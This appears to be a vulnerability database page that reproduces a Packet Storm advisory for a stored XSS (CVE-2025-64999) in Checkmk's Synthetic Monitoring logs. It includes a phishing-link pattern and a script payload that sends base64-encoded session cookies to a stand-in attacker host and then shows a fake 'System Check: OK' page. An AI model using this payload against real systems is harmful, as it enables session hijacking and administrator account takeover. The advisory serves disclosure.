Lucene search
K

๐Ÿ“„ Checkmk 2.4.0p21 Cross Site Scripting

๐Ÿ—“๏ธย 02 Mar 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 130ย Views

Stored XSS in Checkmk logs enables attacker to inject JavaScript via host checks.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-64999
26 Feb 202610:26
โ€“attackerkb
Circl
CVE-2025-64999
26 Feb 202613:18
โ€“circl
CNNVD
Checkmk ๅฎ‰ๅ…จๆผๆดž
26 Feb 202600:00
โ€“cnnvd
CVE
CVE-2025-64999
26 Feb 202610:26
โ€“cve
Cvelist
CVE-2025-64999 Cross-site scripting in HTML logs of Synthetic Monitoring test services
26 Feb 202610:26
โ€“cvelist
EUVD
EUVD-2025-208119
26 Feb 202612:30
โ€“euvd
NVD
CVE-2025-64999
26 Feb 202611:16
โ€“nvd
OSV
UBUNTU-CVE-2025-64999
26 Feb 202611:16
โ€“osv
Positive Technologies
PT-2026-22137
26 Feb 202600:00
โ€“ptsecurity
RedhatCVE
CVE-2025-64999
27 Feb 202619:44
โ€“redhatcve
Rows per page
=============================================================================================================================================
    | # Title     : Checkmk โ‰ค 2.4.0p21 / โ‰ค 2.3.0p42 Synthetic Monitoring Logs โ€“ Stored XSS                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://checkmk.com                                                                                                         |
    =============================================================================================================================================
    
    [+] Summary    :  CVE-2025-64999 A vulnerability due to improper neutralization of user-controlled input affects Checkmk versions:
    
    2.4.0 before 2.4.0p22
    
    2.3.0 before 2.3.0p43
    
    The issue allows an attacker who can manipulate a hostโ€™s check output to inject malicious JavaScript into the Synthetic Monitoring HTML logs. When a victim accesses these logs โ€” potentially via a crafted phishing link โ€” the injected script executes in the context of the authenticated Checkmk session.
    
    Successful exploitation may result in:
    
    Session hijacking
    
    Account takeover
    
    Unauthorized actions within the Checkmk interface
    
    Data exfiltration
    
    The vulnerability is classified as Stored Cross-Site Scripting (Stored XSS) because the malicious payload is stored within monitoring logs and executed when viewed.
    
    [+] POC   :  
    
    Link Crafting
    
    The attacker creates a seemingly legitimate and legitimate link to trick the system administrator into clicking it:
    
    https://<CHKMK_URL>/<SITE>/check_mk/robotmk_suite_report.py?site=<SITE>&host=<TARGET_HOST>&service=<SERVICE_NAME>&log_type=ok
    
    Once the administrator (with an active session) clicks the link, the "unprotected" reports page loads.
    
    The browser reads the injected JavaScript code and executes it immediately with administrator privileges.
    
    <script>
    
        var xhr = new XMLHttpRequest();
        var sensitiveData = btoa(document.cookie); 
        xhr.open("GET", "https://attacker-controlled-site.com/log?data=" + sensitiveData, true);
        xhr.send();
        document.body.innerHTML = "<h1>System Check: OK</h1><p>All services are running normally.</p>";
    </script>
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Mar 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.15.4
CVSS 47.3
EPSS0.00141
SSVC
130